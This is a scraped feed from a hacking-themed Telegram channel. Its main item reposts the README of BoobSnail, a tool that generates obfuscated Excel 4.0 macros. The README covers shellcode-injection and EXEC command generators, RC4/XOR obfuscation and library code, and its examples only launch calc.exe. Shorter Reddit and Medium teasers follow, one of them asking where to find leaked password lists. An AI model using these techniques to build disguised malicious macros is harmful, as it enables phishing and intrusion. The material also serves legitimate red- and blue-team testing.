Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!BoobSnail - Allows Generating Excel 4.0 XLM Macro





BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features:

* various infection techniques;
* various obfuscation techniques;
* translation of formulas into languages other than English;
* can be used as a library - you can easily write your own generator.



Building and Running

Tested on: Python 3.8.7rc1

pip install -r requirements.txt
python boobsnail.py
___. ___. _________ .__.__
\_ |__ ____ ____\_ |__ / _____/ ____ _____ |__| |
| __ \ / _ \ / _ \| __ \ \_____ \ / \__ \ | | |
| \_\ ( <_> | <_> ) \_\ \/ \ | \/ __ \| | |__
|___ /\____/ \____/|___ /_______ /___| (____ /__|____/
\/ \/ \/ \/ \/
Author: @_mzer0 @stm_cyber
(...)


Generators usage

python boobsnail.py -h


To display available generators type:

python boobsnail.py


Examples

Generate obfuscated macro that injects x64 or x86 shellcode:

python boobsnail.py Excel4NtDonutGenerator --inputx86 --inputx64 --out boobsnail.csv


Generate obfuscated macro that runs calc.exe:

python boobsnail.py Excel4ExecGenerator --cmd "powershell.exe -c calc.exe" --out boobsnail.csv


Saving output in Excel

1. Dump output to CSV file.
2. Copy content of CSV file.
3. Run Excel and create a new worksheet.
4. Add new Excel 4.0 Macro (right-click on Sheet1 -> Insert -> MS Excel 4.0 Macro).
5. Paste the content in cell A1 or R1C1.
6. Click Data -> Text to Columns.
7. Click Next -> Set Semicolon as separator and click Finish.

Library usage

BoobSnail shares the excel4lib library that allows creating your own Excel4 macro generator. excel4lib contains few classes that could be used during writing generator:

* excel4lib.macro.Excel4Macro - allows to defining Excel4 formulas, values variables;
* excel4lib.macro.obfuscator.Excel4Obfuscator - allows to obfuscate created instructions in Excel4Macro;
* excel4lib.lang.Excel4Translator - allows translating formulas to another language.

The main idea of this library is to represent Excel4 formulas, variables, formulas arguments, and values as python objects. Thanks to that you are able to change instructions attributes such as formulas or variables names, values, addresses, etc. in an easy way. For example, let's create a simple macro that runs calc.exe

from excel4lib.macro import *
# Create macro object
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())


Result:

cmd="calc.exe";
=EXEC(cmd);


Now let's say that you want to obfuscate your macro. To do this you just need to import obfuscator and pass it to the Excel4Macro object:

from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())


For now excel4lib shares two obfuscation classes:

* excel4lib.macro.obfuscator.Excel4Obfuscator uses Excel 4.0 functions such as BITXOR, SUM, etc to obfuscate your macro;
* excel4lib.macro.obfuscator.Excel4Rc4Obfuscator uses RC4 encryption to obfusacte formulas.

As you can see you can write your own obfuscator class and use it in Excel4Macro.

Sometimes you will need t[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
KitPloit - PenTest Tools!BoobSnail - Allows Generating Excel 4.0 XLM Macro BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features: * various infection techniques; * various…
o translate your macro to another language for example your native language, in my case it's Polish. With excel4lib it's pretty easy. You just need to import Excel4Translator class and call set_language

from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
# Change language
Excel4Translator.set_language("pl_PL")
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())


Result:

cmd="calc.exe";
=URUCHOM.PROGRAM(cmd);


For now, only the English and Polish language is supported. If you want to use another language you need to add translations in the excel4lib/lang/langs directory.

For sure, you will need to create a formula that takes another formula as an argument. You can do this by using Excel4Macro.argument function.

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Create CONCATENATE formula that CONCATENATEs cmd_1 and cmd_2
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
macro.formula("EXEC", exec_arg)
# Dump to CSV
print(macro.to_csv())


Result:

cmd="calc";
.exe;
=EXEC(CONCATENATE(cmd,R2C1));


As you can see ".exe" string was passed to CONCATENATE formula as R2C1. R2C1 is address of ".exe" value (ROW number 2 and COLUMN number 1). excel4lib returns references to formulas, values as addresses. References to variables are returned as their names. You probably noted that Excel4Macro class adds formulas, variables, values to the worksheet automaticly in order in which these objects are created and that the start address is R1C1. What if you want to place formulas in another column or row? You can do this by calling Excel4Macro.set_cords function.

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Column 1
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Column 2
# Change cords to columns 2
macro.set_cords(2,1)
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
exec_call = macro.formula("EXEC", exec_arg)
# Column 1
# Back to column 1. Change cords to column 1 and row 3
macro.set_cords(1,3)
# GOTO EXEC call
macro.goto(exec_call)
# Dump to CSV
print(macro.to_csv())


Result:

cmd="calc";=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);;


Author

mzer0 from stm_cyber team!

Articles

The first step in Excel 4.0 for Red Team

BoobSnail - Excel 4.0 macro generator



Download Boobsnail

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Whois Command Timing Out

I'm currently running a Kali Linux shell through WSL2 and cannot get my whois lookup to work.

Everytime I try it just returns "timeout"

I've tried the following:

+Using different domains +Using IPs +Specifying different whois servers +Creating a whois.conf file and populating it with various servers +sudo +Reinstalling the whois package +Restarting the machine

Everytime, no matter what IP/URL/Domain I query it times out. --verbose just tells me the server and address it is attempting to use. Am I crazy? Is there something I am missing?

submitted by /u/BigSpoonMcGee
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Anyone know where to find a copy of Backtrack (not Kali)?

I know it’s a long shot for sure, but my dad used to be a pen tester (Cisco Certified with Bachelor’s in 2005) and he was talking about Backtrack being his favorite OS from the time.

I’m going into the field at the moment and would love to play with the OS my dad used during CTF back in the day.

submitted by /u/Le_7r011
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Future of binary exploitation

Hello! I'm starting to learn about binary exploitation and 0day development. I have learned about stackoverflows, ASLR, DEP, stack cookies and so on... But then I came across this video:
https://www.youtube.com/watch?v=o_hk9nh8S1M
I was very motivated by the subject, but after watching that video, I really don't know if it is worth the effort to keep learning about this.
Do you think that memory corrumption techniques will disappear completely in the future? What about binary exploitation and 0day development in general? Will it completly disappear?
And by binary exploitation I mean this exploits that hackers use in chrome, ios, safari, etc. To gain remote code execution without user interaction.
Thanks.

submitted by /u/PuzzledWhereas991
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking on Medium
Base has been Pwned!


This is the final machine of the Starting Point category on Hack The Box.

Continue reading on Geek Culture »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
ICYMI: Security and ATOs…

https://cdn-images-1.medium.com/max/1242/1*Abg0R34-0ek4A9Vczg9NwA.png
ICYMI is an ongoing series of blog posts memorializing important Twitter threads from thought leaders at Coinbase and beyond. In this…

Continue reading on The Coinbase Blog »

___________________________
@hacking_Attack
@Hacking_Video
Do you share every single findings to stakeholder?
https://www.reddit.com/r/redteamsec/comments/pohpm0/do_you_share_every_single_findings_to_stakeholder/

Taken from rapid7 (https://www.rapid7.com/blog/post/2016/06/23/penetration-testing-vs-red-teaming-the-age-old-debate-of-pirates-vs-ninja-continues/) The goal of the Red Team Assessment is NOT to find as many vulnerabilities as possible. The goal is to test the organization's detection and response capabilities. Question is, do you share every single findings that you have in Red Team Assessment? Or do you keep some of them to be used in the following exercise later? submitted by /u/w0lfcat (https://www.reddit.com/user/w0lfcat)
[link] (https://www.reddit.com/r/redteamsec/comments/pohpm0/do_you_share_every_single_findings_to_stakeholder/) [comments] (https://www.reddit.com/r/redteamsec/comments/pohpm0/do_you_share_every_single_findings_to_stakeholder/)

___________________________
@hacking_Attack
@Hacking_Video
Hacking on Medium
What is Vulnerability Assessment and Penetration Testing (VAPT)?


Technology is spreading its wings to provide a profusion of opportunities. We have millions of smart, interconnected devices and complex…

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
How does one find their leaked passwords from HaveIBeenpwned?

I'm trying to recover an old blockchain.com account. I cannot for the life of me remember the password I used at the time and because of how the site is set up I cannot verify as they don't store the passwords. I've noticed my email in a few leaks on HaveIbeenpwned and some of the sites listed I'm pretty sure the password would be the same or a variation on it.

So yeah, how does one go about finding these password lists?

submitted by /u/toomanynamesaretook
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking on Medium
An Introduction to HTTP Protocol


HTTP — HyperText Transfer Protocol — is a stateless protocol, working on the application layer. It is the backbone of the internet. It…

Continue reading on Medium »
Hacking on Medium
Shell Scripting: Getting started with shell scripting


Hey, everyone! In this blog, we will learn about something that interests many of us: Shell Scripting.

Continue reading on Medium »
Hacking on Medium
GTA San Andreas | Grand Theft Auto San Andreas Mod Apk


GTA San Andreas is also a best experience action game that was launched in 2004 which was created by Rockstar north And this game was…

Continue reading on Medium »
Hacking on Medium
Snapchat Mod Apk Premium Unlocked


Snapchat Mod Apk is a social application and is additionally accessible for Android. Assuming that you want to prank and second propose…

Continue reading on Medium »